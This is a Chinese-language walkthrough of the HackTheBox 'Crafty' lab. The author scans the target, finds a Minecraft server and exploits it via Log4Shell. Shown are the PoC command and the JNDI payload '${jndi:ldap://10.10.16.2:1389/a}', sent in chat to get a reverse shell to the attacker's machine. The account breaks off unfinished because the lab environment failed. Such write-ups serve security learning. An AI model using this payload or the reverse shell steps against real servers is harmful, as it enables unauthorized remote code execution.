每日一更 HackTheBox 系列
HackTheBox-Crafty
温馨提示 本期环境很讨厌 非常讨厌 我没获取到管理员flag 因为他的环境有问题
攻击:10.10.16.2
靶机:10.10.11.249
先扫描
80端口 iis10.0
访问看看
老规矩 写hosts
访问爆出子域名
再写hosts 发现这个play. 就是他自己的域名 iis10.0 没有exp可以用 扫描目录也没扫出来啥 那回到扫描结果 加个-p- 参数 重新扫描 端口应该没扫完
果然还有个端口25565
minecraft Minecraft 1.16.5 我的世界??!!!?我的世界?! 万万没想到啊 这个服务器竟然是我的世界服务器
那怎么整呢 下载我的世界呗
kali 基于Debian开发的所以下载Debian版本
dpkg -i '/root/Downloads/Minecraft.deb'
apt-get -f install
我的世界 启动!
对于这个漏洞 其实我还是不太懂
官方发出的攻略 HackTheBox-Crafty
log4j漏洞 利用的POC log4j-poc
启动以后需要 Microsoft 账号
安装 log4j poc 的依赖
修改poc里面的命令 改成 cmd /bin/bash 是Linux的但是目标靶机是windows
还得需要Java8 这里建议做一个快照 毕竟kali新版 Java是17 我最喜欢的版本 你回到Java8 的话 他新版的burp 可能用不了
需要 Minecraft 游戏本身或 Minecraft 客户端连接到目标上运行的 Minecraft 服务器。刚刚下载的我的世界游戏启动以后好卡
GitHub - ammaraskar/pyCraft: Minecraft-client networking library in Python
为此,我决定使用 PyCraft,一个 Minecraft Python 客户端库。
但是 pycraft 这个工具我试了下官方的文档给出的方法不好使
所以新的办法
wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
tar -zxf jdk-8u181-linux-x64.tar.gz
mv jdk1.8.0_181 jdk1.8.0_20
# 下载好 TLauncher-2.899 链接 : https://tlauncher.org/en/
#
./jdk1.8.0_181/jre/bin/java -jar ./TL/TLauncher-2.899.jar
连接服务器
然后执行poc
python3 poc.py --userip 10.10.16.2 --webport 8888 --lport 9001
自己的IP 然后web端口 监听端口
启动游戏 按一下 / 然后删除这个 字符
发送
${jndi:ldap://10.10.16.2:1389/a}
然后反弹shell 就OK了
在用户的桌面上获取flag
要使用 msfvenom 创建 Meterpreter 反向 shell,我们首先需要选择一个有效载荷。为此,我们必须确定目标计算机的体系结构。我们可以通过在命令提示符下执行命令“”来检索处理器体系结构。
在server/plugins 文件夹当中看到一个jar包
下载这个jar包 反编译
接下来的步骤去我上面发的那个官方链接看看 这个反弹shell反弹不回来了 一直在连接
我服了这什么NT环境重启了好几次 只要断了就不能重连上
怪不得评分2.多 这垃圾环境 我也用了它自带的 PwnBox 自带环境也不行
多无语啊